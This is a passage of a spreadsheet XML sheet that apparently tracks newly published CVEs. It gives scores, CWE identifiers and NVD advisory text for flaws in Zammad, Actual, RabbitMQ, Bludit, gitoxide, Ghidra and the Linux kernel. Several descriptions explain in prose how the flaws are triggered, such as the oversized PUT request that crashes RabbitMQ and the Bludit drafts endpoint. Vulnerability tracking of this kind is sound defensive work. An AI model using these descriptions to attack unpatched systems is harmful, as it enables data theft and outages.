      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56723</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, a customer who can view a ticket cannot see internal ticket articles through the article listing API. However, the same customer can directly request an attachment belonging to an internal article via the attachment download endpoint, bypassing article-level authorization. This results in an inconsistency: The article listing hides internal articles from customers. The attachment download only checks the parent ticket, not the article, so the same customer can download the attachment directly. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56723</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56724</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, summary An issue with permission checks in the knowledge base management area has been identified. Under certain conditions, data validation for linked items was not fully enforced. This could have allowed users with limited read permissions to interact with items outside their assigned access scope. Data access has been strengthened in the current version through additional validation routines. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56724</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56727</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-347, CWE-391</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, summary In Zammad's inbound PGP email processing, the return value of the gpg verification call was silently discarded. Regardless of whether gpg reported a valid, invalid, or missing signature, the handler unconditionally wrote sign: { success: true, comment: "Good signature" } to the article's security preferences. Impact Any sender could tamper with the body of a multipart/signed PGP email, or craft a message with an entirely fabricated or mismatched signature, and Zammad would display it to the recipient as cryptographically verified with a "Good signature" label. Users and agents relying on Zammad's signature indicator to confirm message authenticity and integrity would be misled into trusting modified or forged content. The vulnerability affects all inbound PGP-signed emails processed while the PGP integration is enabled. This issue is fixed in version 7.0.2.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56727</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57449</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr">
        <is>
          <t>github, requests, gin</t>
        </is>
      </c>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284, CWE-863</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>Actual is a local-first personal finance tool. Prior to 26.7.0, Actual Sync Server's CORS proxy is intended to let authenticated users fetch resources only from repositories listed in the official plugin allowlist. When `ACTUAL_GITHUB_TOKEN` is configured, the proxy automatically attaches the server's GitHub token to GitHub requests. The GitHub API allowlist check uses a raw `startsWith()` prefix test for `/repos/{owner}/{repo}` without requiring a path boundary after the repository name. If an allowlisted public plugin repository is `https://github.com/acme/plugin`, the proxy also accepts GitHub API URLs. Those URLs are outside the allowlisted repository but still pass because their API path starts with `/repos/acme/plugin`. The proxy then forwards the request with the server's `ACTUAL_GITHUB_TOKEN`, allowing any authenticated Actual user to read private GitHub resources reachable by that token. Version 26.7.0 fixes the issue.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57449</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67408</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>docker, requests, gin</t>
        </is>
      </c>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.1.0 until 4.3.3, 4.2.9, and 4.1.11, Stream Management Super-Stream Binding Keys Allocation Allows Low-Privilege Node Denial of Service. rabbitMQ 4.3.1 with rabbitmqstreammanagement enabled accepts PUT /api/stream/super-streams/{vhost}/{name} requests from an authenticated management user that can access the target vhost. When the request body contains the binding-keys field, the handler parses the attacker-controlled comma-separated string and builds the full stream-name list before checking whether the user has permission to configure the resulting streams. A low-privileged management user with vhost access but no configure, write, or read permission can therefore force large transient allocations before the resource permission check. In a 768 MB memory-limited container, one HTTP PUT with about 4.5 MB of JSON body killed the RabbitMQ container with Docker state exited true An authenticated low-privileged management user can kill a memory-limited RabbitMQ node with one HTTP This issue is fixed in versions 4.3.3, 4.2.9, and 4.1.11.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67408</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67419</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-407</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. Prior to 4.3.5, an authenticated user who can bind a queue to a topic exchange and publish to it can use consecutive # segments in a binding key to make both topic matchers revisit the same trie-node and routing-key-suffix states without memoization. The matcher materializes duplicate destinations before deduplication, causing combinatorial CPU work and memory pressure that can disrupt routing for all tenants. This vulnerability is fixed in 4.3.5.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67419</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84464</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, zammad's External Data Source feature, used to look up records from an external system, did not properly verify whether a user was allowed to see a specific ticket, user, group, or organization before including its details in a request to that external system. An authenticated user, including one with only basic customer access, could exploit this by referencing another record's ID, and thereby view details of tickets, customer accounts, teams, or organizations that did not belong to them. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84464</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84465</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-295, CWE-347</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when Zammad checks the digital signature on an incoming S/MIME-signed email, it does not verify that the signing certificate is genuinely trusted, it only checks whether a certificate with a matching name is already stored in the system. An attacker can create their own certificate using the name of a real, previously trusted sender and use it to send a forged email. Zammad will display that email with the same "validly signed" indicator as a genuine message from the real sender, even though the attacker never had access to that sender's actual certificate or private key. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84465</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93306</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>IBM Server Firmware FW1120.00 through FW1120.01, FW1110.00 through FW1110.31, FW1060.00 through FW1060.81, and FW950.00 through FW950.H3 is affected by a vulnerability in the ASMI web interface. An unauthenticated attacker on the management network can send a malformed HTTPS request to ASMI, causing the web server to crash with possible memory corruption and generate an error log. The ASMI web interface will restart automatically; however, repeated exploitation could result in a sustained loss of access to the ASMI management interface, resulting in an integrity and availability impact.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93306</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93365</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Bludit CMS through 3.22.0 contains a missing authorization vulnerability that allows authenticated users holding the Author or Editor role to read the full content of private drafts and scheduled posts belonging to any other user, including administrators, by exploiting the content-get-list AJAX endpoint in bl-kernel/ajax/content-get-list.php. Attackers can send an authenticated GET request to the admin AJAX endpoint with the draft parameter set to true, triggering getList() without ownership constraints and returning serialized page objects site-wide, exposing pre-publication material and sensitive notes stored in administrator-owned drafts.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93365</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100419</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>gitoxide gix-fs before 0.23.0 contains a path validation bypass vulnerability in the worktree checkout mechanism that allows attackers to escape the worktree directory via symlink manipulation. During forced checkout with overwrite_existing enabled, attackers can craft malicious repository trees where symlink entries replace validated directories, causing subsequent files to be written outside the worktree through the symlink for code execution or file manipulation.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100419</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100504</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Ghidra versions through 12.1.4 contain a stack-based out-of-bounds write vulnerability in the decompiler's leftshift128 function when processing negative shift amounts from p-code. Attackers can craft malicious binaries with specific instruction sequences that trigger the overflow when decompiled, corrupting memory and potentially achieving code execution.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100504</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97589</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr"/>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix wrong return code to engine in asynch callbacks
When crypto_finalize_hash_request() or
crypto_finalize_skcipher_request() explicitly completes a request, the
do_one_request callback must return 0 to indicate successful
handling. Returning a negative error code causes the crypto engine to
assume the driver failed to take ownership and triggers a second
completion via crypto_request_complete(), resulting in a double
completion. This pattern occurs in paes_s390.c 4 times and once in
phmac_s390.c.
Fixed in phmac_do_one_request() and all four paes do_one_request
callbacks (ecb, cbc, ctr, xts) by returning 0 after explicit
finalization instead of propagating the error code.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97589</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97608</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr"/>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_log: unregister loggers before per-net teardown
nf_log_syslog and nfnetlink_log unregister their per-network namespace
operations before unregistering their global logger backends. This
leaves a window where a sysctl or netlink writer can rebind the still-
registered logger after the per-net pre-exit callback cleared the old
selection.
The race looks like this:
  CPU 0                                 CPU 1
  ----                                  ----
  unregister_pernet_subsys()
    nf_log_unset(net, logger)
      net-&gt;nf.nf_loggers[pf] = NULL
                                        lock nf_log_mutex
                                        find logger in loggers[][]
                                        net-&gt;nf.nf_loggers[pf] = logger
                                        unlock nf_log_mutex
  nf_log_unregister(logger)
    lock nf_log_mutex
    loggers[pf][type] = NULL
    unlock nf_log_mutex
    synchronize_rcu()
  module exit returns
  module core frees backend memory
Later, a sysctl read or packet logging operation can dereference the
stale per-net logger pointer.
Fix this by unregistering the global logger backends before tearing down
per-net state. Once the global registrations are gone, later writers can
no longer rebind the logger. unregister_pernet_subsys() already waits
for an RCU grace period after the pre-exit callback clears the per-net
selection, while nf_log_unregister() continues to cover readers of the
global logger table.
Apply this ordering fix to both nf_log backends that combine per-net
teardown with global logger registration.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97608</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97609</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
